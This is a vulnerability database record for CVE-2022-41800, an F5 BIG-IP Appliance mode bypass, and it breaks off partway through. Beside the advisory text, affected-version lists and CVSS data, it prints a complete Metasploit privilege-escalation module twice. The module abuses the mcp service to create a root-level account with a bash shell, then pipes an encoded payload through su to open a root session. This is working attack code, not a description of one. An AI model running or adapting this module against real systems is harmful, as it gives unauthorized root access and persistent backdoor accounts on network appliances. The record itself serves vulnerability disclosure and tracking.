var-202211-1118
Vulnerability from variot
In all versions of BIG-IP, when running in Appliance mode, an authenticated user assigned the Administrator role may be able to bypass Appliance mode restrictions, utilizing an undisclosed iControl REST endpoint. A successful exploit can allow the attacker to cross a security boundary.
Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated. BIG-IP Access Policy Manager (APM) , BIG-IP Advanced Firewall Manager (AFM) , BIG-IP Analytics etc. multiple F5 Networks The product contains a command injection vulnerability.Information may be obtained and information may be tampered with. This is a control plane issue; there is no data plane exposure. Appliance mode is enforced by a specific license or may be enabled or disabled for individual Virtual Clustered Multiprocessing (vCMP) guest instances. ##
This module requires Metasploit: https://metasploit.com/download
Current source: https://github.com/rapid7/metasploit-framework
require 'unix_crypt'
class MetasploitModule < Msf::Exploit::Local include Msf::Post::Linux::F5Mcp include Msf::Exploit::CmdStager
def initialize(info = {}) super( update_info( info, 'Name' => 'F5 Big-IP Create Admin User', 'Description' => %q{ This creates a local user with a username/password and root-level privileges. Note that a root-level account is not required to do this, which makes it a privilege escalation issue.
Note that this is pretty noisy, since it creates a user account and
creates log files and such. Additionally, most (if not all)
vulnerabilities in F5 grant root access anyways.
Adapted from https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-privesc.rb
},
'License' => MSF_LICENSE,
'Author' => ['Ron Bowes'],
'Platform' => [ 'unix', 'linux', 'python' ],
'SessionTypes' => ['shell', 'meterpreter'],
'References' => [
['URL', 'https://github.com/rbowes-r7/refreshing-mcp-tool'], # Original PoC
['URL', 'https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/'],
['URL', 'https://support.f5.com/csp/article/K97843387'],
],
'Privileged' => true,
'DisclosureDate' => '2022-11-16',
'Arch' => [ ARCH_CMD, ARCH_PYTHON ],
'Type' => :unix_cmd,
'Targets' => [[ 'Auto', {} ]],
'Notes' => {
'Stability' => [],
'Reliability' => [],
'SideEffects' => []
}
)
)
register_options([
OptString.new('USERNAME', [true, 'Username to create (default: random)', Rex::Text.rand_text_alphanumeric(8)]),
OptString.new('PASSWORD', [true, 'Password for the new user (default: random)', Rex::Text.rand_text_alphanumeric(12)]),
OptBool.new('CREATE_SESSION', [true, 'If set, use the new account to create a root session', true]),
])
end
def exploit # Get or generate the username/password fail_with(Failure::BadConfig, 'USERNAME cannot be empty') if datastore['USERNAME'].empty? username = datastore['USERNAME']
if datastore['CREATE_SESSION']
password = Rex::Text.rand_text_alphanumeric(12)
new_password = datastore['PASSWORD'] || Rex::Text.rand_text_alphanumeric(12)
print_status("Will attempt to create user #{username} / #{password}, then change password to #{new_password} when creating a session")
else
password = datastore['PASSWORD'] || Rex::Text.rand_text_alphanumeric(12)
print_status("Will attempt to create user #{username} / #{password}")
end
# If the password is already hashed, leave it as-is
vprint_status('Hashing the password with SHA512')
hashed_password = UnixCrypt::SHA512.build(password)
if !hashed_password || hashed_password.empty?
fail_with(Failure::BadConfig, 'Failed to hash the password with String.crypt')
end
# These requests have to go in a single 'session', which, to us, is
# a single packet (since we don't have AF_UNIX sockets)
result = mcp_send_recv([
# Authenticate as 'admin' (this probably shouldn't work but does)
mcp_build('user_authenticated', 'structure', [
mcp_build('user_authenticated_name', 'string', 'admin')
]),
# Start transaction
mcp_build('start_transaction', 'structure', [
mcp_build('start_transaction_load_type', 'ulong', 0)
]),
# Create the role mapping
mcp_build('create', 'structure', [
mcp_build('user_role_partition', 'structure', [
mcp_build('user_role_partition_user', 'string', username),
mcp_build('user_role_partition_role', 'ulong', 0),
mcp_build('user_role_partition_partition', 'string', '[All]'),
])
]),
# Create the userdb entry
mcp_build('create', 'structure', [
mcp_build('userdb_entry', 'structure', [
mcp_build('userdb_entry_name', 'string', username),
mcp_build('userdb_entry_partition_id', 'string', 'Common'),
mcp_build('userdb_entry_is_system', 'ulong', 0),
mcp_build('userdb_entry_shell', 'string', '/bin/bash'),
mcp_build('userdb_entry_is_crypted', 'ulong', 1),
mcp_build('userdb_entry_passwd', 'string', hashed_password),
])
]),
# Finish the transaction
mcp_build('end_transaction', 'structure', [])
])
# Handle errors
if result.nil?
fail_with(Failure::Unknown, 'Request to mcp appeared to fail')
end
# The only result we really care about is an error
error_returned = false
result.each do |r|
result = mcp_get_single(r, 'result')
result_code = mcp_get_single(result, 'result_code')
# If there's no code or it's zero, just ignore it
if result_code.nil? || result_code == 0
next
end
# If we're here, an error was returned!
error_returned = true
# Otherwise, try and get result_message
result_message = mcp_get_single(result, 'result_message')
if result_message.nil?
print_warning("mcp query returned a non-zero result (#{result_code}), but no error message")
else
print_error("mcp query returned an error message: #{result_message} (code: #{result_code})")
end
end
# Let them know if it likely worked
if !error_returned
print_good("Service didn't return an error, so user was likely created!")
if datastore['CREATE_SESSION']
print_status('Attempting create a root session...')
out = cmd_exec("echo -ne \"#{password}\\n#{password}\\n#{new_password}\\n#{new_password}\\n#{payload.encoded}\\n\" | su #{username}")
vprint_status("Output from su command: #{out}")
end
end
end end
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202211-1118",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "big-ip analytics",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "15.1.0"
},
{
"model": "big-ip application security manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "14.1.5"
},
{
"model": "big-ip local traffic manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "14.1.0"
},
{
"model": "big-ip link controller",
"scope": "eq",
"trust": 1.0,
"vendor": "f5",
"version": "17.0.0"
},
{
"model": "big-ip policy enforcement manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "16.1.0"
},
{
"model": "big-ip policy enforcement manager",
"scope": "eq",
"trust": 1.0,
"vendor": "f5",
"version": "17.0.0"
},
{
"model": "big-ip analytics",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "14.1.0"
},
{
"model": "big-ip global traffic manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "16.1.3"
},
{
"model": "big-ip application security manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "15.1.8"
},
{
"model": "big-ip application security manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "15.1.0"
},
{
"model": "big-ip link controller",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "16.1.0"
},
{
"model": "big-ip link controller",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "16.1.3"
},
{
"model": "big-ip policy enforcement manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "13.1.5"
},
{
"model": "big-ip policy enforcement manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "14.1.5"
},
{
"model": "big-ip analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "f5",
"version": "17.0.0"
},
{
"model": "big-ip access policy manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "16.1.0"
},
{
"model": "big-ip local traffic manager",
"scope": "eq",
"trust": 1.0,
"vendor": "f5",
"version": "17.0.0"
},
{
"model": "big-ip access policy manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "16.1.3"
},
{
"model": "big-ip fraud protection service",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "13.1.0"
},
{
"model": "big-ip analytics",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "13.1.0"
},
{
"model": "big-ip policy enforcement manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "15.1.8"
},
{
"model": "big-ip policy enforcement manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "15.1.0"
},
{
"model": "big-ip global traffic manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "15.1.0"
},
{
"model": "big-ip analytics",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "13.1.5"
},
{
"model": "big-ip domain name system",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "16.1.0"
},
{
"model": "big-ip access policy manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "14.1.5"
},
{
"model": "big-ip advanced firewall manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "13.1.0"
},
{
"model": "big-ip local traffic manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "13.1.5"
},
{
"model": "big-ip fraud protection service",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "16.1.0"
},
{
"model": "big-ip fraud protection service",
"scope": "eq",
"trust": 1.0,
"vendor": "f5",
"version": "17.0.0"
},
{
"model": "big-ip local traffic manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "14.1.5"
},
{
"model": "big-ip local traffic manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "16.1.0"
},
{
"model": "big-ip policy enforcement manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "14.1.0"
},
{
"model": "big-ip link controller",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "15.1.0"
},
{
"model": "big-ip application security manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "13.1.0"
},
{
"model": "big-ip access policy manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "15.1.8"
},
{
"model": "big-ip access policy manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "15.1.0"
},
{
"model": "big-ip domain name system",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "13.1.5"
},
{
"model": "big-ip domain name system",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "14.1.5"
},
{
"model": "big-ip local traffic manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "15.1.8"
},
{
"model": "big-ip fraud protection service",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "13.1.5"
},
{
"model": "big-ip link controller",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "14.1.0"
},
{
"model": "big-ip application acceleration manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "16.1.0"
},
{
"model": "big-ip fraud protection service",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "14.1.5"
},
{
"model": "big-ip domain name system",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "15.1.8"
},
{
"model": "big-ip domain name system",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "15.1.0"
},
{
"model": "big-ip global traffic manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "13.1.0"
},
{
"model": "big-ip policy enforcement manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "13.1.0"
},
{
"model": "big-ip fraud protection service",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "15.1.8"
},
{
"model": "big-ip fraud protection service",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "15.1.0"
},
{
"model": "big-ip application acceleration manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "13.1.5"
},
{
"model": "big-ip application security manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "13.1.5"
},
{
"model": "big-ip local traffic manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "15.1.0"
},
{
"model": "big-ip application acceleration manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "14.1.5"
},
{
"model": "big-ip domain name system",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "14.1.0"
},
{
"model": "big-ip global traffic manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "16.1.0"
},
{
"model": "big-ip global traffic manager",
"scope": "eq",
"trust": 1.0,
"vendor": "f5",
"version": "17.0.0"
},
{
"model": "big-ip link controller",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "13.1.0"
},
{
"model": "big-ip fraud protection service",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "14.1.0"
},
{
"model": "big-ip access policy manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "13.1.0"
},
{
"model": "big-ip application acceleration manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "15.1.8"
},
{
"model": "big-ip application acceleration manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "15.1.0"
},
{
"model": "big-ip policy enforcement manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "16.1.3"
},
{
"model": "big-ip global traffic manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "13.1.5"
},
{
"model": "big-ip global traffic manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "14.1.5"
},
{
"model": "big-ip access policy manager",
"scope": "eq",
"trust": 1.0,
"vendor": "f5",
"version": "17.0.0"
},
{
"model": "big-ip application acceleration manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "14.1.0"
},
{
"model": "big-ip application security manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "14.1.0"
},
{
"model": "big-ip link controller",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "13.1.5"
},
{
"model": "big-ip domain name system",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "13.1.0"
},
{
"model": "big-ip link controller",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "14.1.5"
},
{
"model": "big-ip local traffic manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "13.1.0"
},
{
"model": "big-ip global traffic manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "15.1.8"
},
{
"model": "big-ip analytics",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "16.1.3"
},
{
"model": "big-ip access policy manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "13.1.5"
},
{
"model": "big-ip domain name system",
"scope": "eq",
"trust": 1.0,
"vendor": "f5",
"version": "17.0.0"
},
{
"model": "big-ip link controller",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "15.1.8"
},
{
"model": "big-ip local traffic manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "16.1.3"
},
{
"model": "big-ip global traffic manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "14.1.0"
},
{
"model": "big-ip analytics",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "14.1.5"
},
{
"model": "big-ip application acceleration manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "13.1.0"
},
{
"model": "big-ip analytics",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "16.1.0"
},
{
"model": "big-ip application security manager",
"scope": "eq",
"trust": 1.0,
"vendor": "f5",
"version": "17.0.0"
},
{
"model": "big-ip domain name system",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "16.1.3"
},
{
"model": "big-ip fraud protection service",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "16.1.3"
},
{
"model": "big-ip application acceleration manager",
"scope": "eq",
"trust": 1.0,
"vendor": "f5",
"version": "17.0.0"
},
{
"model": "big-ip analytics",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "15.1.8"
},
{
"model": "big-ip access policy manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "14.1.0"
},
{
"model": "big-ip application security manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "16.1.3"
},
{
"model": "big-ip application security manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "16.1.0"
},
{
"model": "big-ip advanced firewall manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "17.0.0"
},
{
"model": "big-ip application acceleration manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "16.1.3"
},
{
"model": "big-ip advanced firewall manager",
"scope": null,
"trust": 0.8,
"vendor": "f5",
"version": null
},
{
"model": "big-ip application acceleration manager",
"scope": null,
"trust": 0.8,
"vendor": "f5",
"version": null
},
{
"model": "big-ip access policy manager",
"scope": null,
"trust": 0.8,
"vendor": "f5",
"version": null
},
{
"model": "big-ip application security manager",
"scope": null,
"trust": 0.8,
"vendor": "f5",
"version": null
},
{
"model": "big-ip analytics",
"scope": null,
"trust": 0.8,
"vendor": "f5",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-023344"
},
{
"db": "NVD",
"id": "CVE-2022-41800"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Ron Bowes",
"sources": [
{
"db": "PACKETSTORM",
"id": "170847"
}
],
"trust": 0.1
},
"cve": "CVE-2022-41800",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.3,
"id": "CVE-2022-41800",
"impactScore": 5.8,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 8.7,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2022-41800",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2022-41800",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "f5sirt@f5.com",
"id": "CVE-2022-41800",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2022-41800",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202211-2947",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-023344"
},
{
"db": "CNNVD",
"id": "CNNVD-202211-2947"
},
{
"db": "NVD",
"id": "CVE-2022-41800"
},
{
"db": "NVD",
"id": "CVE-2022-41800"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "\nIn all versions of BIG-IP, when running in Appliance mode, an authenticated user assigned the Administrator role may be able to bypass Appliance mode restrictions, utilizing an undisclosed iControl REST endpoint. A successful exploit can allow the attacker to cross a security boundary. \u00a0\u00a0\n\nNote: Software versions which have reached End of Technical Support (EoTS) are not evaluated. BIG-IP Access Policy Manager (APM) , BIG-IP Advanced Firewall Manager (AFM) , BIG-IP Analytics etc. multiple F5 Networks The product contains a command injection vulnerability.Information may be obtained and information may be tampered with. This is a control plane issue; there is no data plane exposure. Appliance mode is enforced by a specific license or may be enabled or disabled for individual Virtual Clustered Multiprocessing (vCMP) guest instances. ##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire \u0027unix_crypt\u0027\n\nclass MetasploitModule \u003c Msf::Exploit::Local\n include Msf::Post::Linux::F5Mcp\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n \u0027Name\u0027 =\u003e \u0027F5 Big-IP Create Admin User\u0027,\n \u0027Description\u0027 =\u003e %q{\n This creates a local user with a username/password and root-level\n privileges. Note that a root-level account is not required to do this,\n which makes it a privilege escalation issue. \n\n Note that this is pretty noisy, since it creates a user account and\n creates log files and such. Additionally, most (if not all)\n vulnerabilities in F5 grant root access anyways. \n\n Adapted from https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-privesc.rb\n },\n \u0027License\u0027 =\u003e MSF_LICENSE,\n \u0027Author\u0027 =\u003e [\u0027Ron Bowes\u0027],\n \u0027Platform\u0027 =\u003e [ \u0027unix\u0027, \u0027linux\u0027, \u0027python\u0027 ],\n \u0027SessionTypes\u0027 =\u003e [\u0027shell\u0027, \u0027meterpreter\u0027],\n \u0027References\u0027 =\u003e [\n [\u0027URL\u0027, \u0027https://github.com/rbowes-r7/refreshing-mcp-tool\u0027], # Original PoC\n [\u0027URL\u0027, \u0027https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/\u0027],\n [\u0027URL\u0027, \u0027https://support.f5.com/csp/article/K97843387\u0027],\n ],\n \u0027Privileged\u0027 =\u003e true,\n \u0027DisclosureDate\u0027 =\u003e \u00272022-11-16\u0027,\n \u0027Arch\u0027 =\u003e [ ARCH_CMD, ARCH_PYTHON ],\n \u0027Type\u0027 =\u003e :unix_cmd,\n \u0027Targets\u0027 =\u003e [[ \u0027Auto\u0027, {} ]],\n \u0027Notes\u0027 =\u003e {\n \u0027Stability\u0027 =\u003e [],\n \u0027Reliability\u0027 =\u003e [],\n \u0027SideEffects\u0027 =\u003e []\n }\n )\n )\n\n register_options([\n OptString.new(\u0027USERNAME\u0027, [true, \u0027Username to create (default: random)\u0027, Rex::Text.rand_text_alphanumeric(8)]),\n OptString.new(\u0027PASSWORD\u0027, [true, \u0027Password for the new user (default: random)\u0027, Rex::Text.rand_text_alphanumeric(12)]),\n\n OptBool.new(\u0027CREATE_SESSION\u0027, [true, \u0027If set, use the new account to create a root session\u0027, true]),\n ])\n end\n\n def exploit\n # Get or generate the username/password\n fail_with(Failure::BadConfig, \u0027USERNAME cannot be empty\u0027) if datastore[\u0027USERNAME\u0027].empty?\n username = datastore[\u0027USERNAME\u0027]\n\n if datastore[\u0027CREATE_SESSION\u0027]\n password = Rex::Text.rand_text_alphanumeric(12)\n new_password = datastore[\u0027PASSWORD\u0027] || Rex::Text.rand_text_alphanumeric(12)\n\n print_status(\"Will attempt to create user #{username} / #{password}, then change password to #{new_password} when creating a session\")\n else\n password = datastore[\u0027PASSWORD\u0027] || Rex::Text.rand_text_alphanumeric(12)\n\n print_status(\"Will attempt to create user #{username} / #{password}\")\n end\n\n # If the password is already hashed, leave it as-is\n vprint_status(\u0027Hashing the password with SHA512\u0027)\n hashed_password = UnixCrypt::SHA512.build(password)\n\n if !hashed_password || hashed_password.empty?\n fail_with(Failure::BadConfig, \u0027Failed to hash the password with String.crypt\u0027)\n end\n\n # These requests have to go in a single \u0027session\u0027, which, to us, is\n # a single packet (since we don\u0027t have AF_UNIX sockets)\n result = mcp_send_recv([\n # Authenticate as \u0027admin\u0027 (this probably shouldn\u0027t work but does)\n mcp_build(\u0027user_authenticated\u0027, \u0027structure\u0027, [\n mcp_build(\u0027user_authenticated_name\u0027, \u0027string\u0027, \u0027admin\u0027)\n ]),\n\n # Start transaction\n mcp_build(\u0027start_transaction\u0027, \u0027structure\u0027, [\n mcp_build(\u0027start_transaction_load_type\u0027, \u0027ulong\u0027, 0)\n ]),\n\n # Create the role mapping\n mcp_build(\u0027create\u0027, \u0027structure\u0027, [\n mcp_build(\u0027user_role_partition\u0027, \u0027structure\u0027, [\n mcp_build(\u0027user_role_partition_user\u0027, \u0027string\u0027, username),\n mcp_build(\u0027user_role_partition_role\u0027, \u0027ulong\u0027, 0),\n mcp_build(\u0027user_role_partition_partition\u0027, \u0027string\u0027, \u0027[All]\u0027),\n ])\n ]),\n\n # Create the userdb entry\n mcp_build(\u0027create\u0027, \u0027structure\u0027, [\n mcp_build(\u0027userdb_entry\u0027, \u0027structure\u0027, [\n mcp_build(\u0027userdb_entry_name\u0027, \u0027string\u0027, username),\n mcp_build(\u0027userdb_entry_partition_id\u0027, \u0027string\u0027, \u0027Common\u0027),\n mcp_build(\u0027userdb_entry_is_system\u0027, \u0027ulong\u0027, 0),\n mcp_build(\u0027userdb_entry_shell\u0027, \u0027string\u0027, \u0027/bin/bash\u0027),\n mcp_build(\u0027userdb_entry_is_crypted\u0027, \u0027ulong\u0027, 1),\n mcp_build(\u0027userdb_entry_passwd\u0027, \u0027string\u0027, hashed_password),\n ])\n ]),\n\n # Finish the transaction\n mcp_build(\u0027end_transaction\u0027, \u0027structure\u0027, [])\n ])\n\n # Handle errors\n if result.nil?\n fail_with(Failure::Unknown, \u0027Request to mcp appeared to fail\u0027)\n end\n\n # The only result we really care about is an error\n error_returned = false\n result.each do |r|\n result = mcp_get_single(r, \u0027result\u0027)\n result_code = mcp_get_single(result, \u0027result_code\u0027)\n\n # If there\u0027s no code or it\u0027s zero, just ignore it\n if result_code.nil? || result_code == 0\n next\n end\n\n # If we\u0027re here, an error was returned!\n error_returned = true\n\n # Otherwise, try and get result_message\n result_message = mcp_get_single(result, \u0027result_message\u0027)\n if result_message.nil?\n print_warning(\"mcp query returned a non-zero result (#{result_code}), but no error message\")\n else\n print_error(\"mcp query returned an error message: #{result_message} (code: #{result_code})\")\n end\n end\n\n # Let them know if it likely worked\n if !error_returned\n print_good(\"Service didn\u0027t return an error, so user was likely created!\")\n\n if datastore[\u0027CREATE_SESSION\u0027]\n print_status(\u0027Attempting create a root session...\u0027)\n\n out = cmd_exec(\"echo -ne \\\"#{password}\\\\n#{password}\\\\n#{new_password}\\\\n#{new_password}\\\\n#{payload.encoded}\\\\n\\\" | su #{username}\")\n\n vprint_status(\"Output from su command: #{out}\")\n end\n end\n end\nend\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-41800"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-023344"
},
{
"db": "VULHUB",
"id": "VHN-438078"
},
{
"db": "VULMON",
"id": "CVE-2022-41800"
},
{
"db": "PACKETSTORM",
"id": "170847"
}
],
"trust": 1.89
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-438078",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-438078"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2022-41800",
"trust": 3.5
},
{
"db": "PACKETSTORM",
"id": "170847",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2022-023344",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "170008",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.5995",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202211-2947",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-438078",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169967",
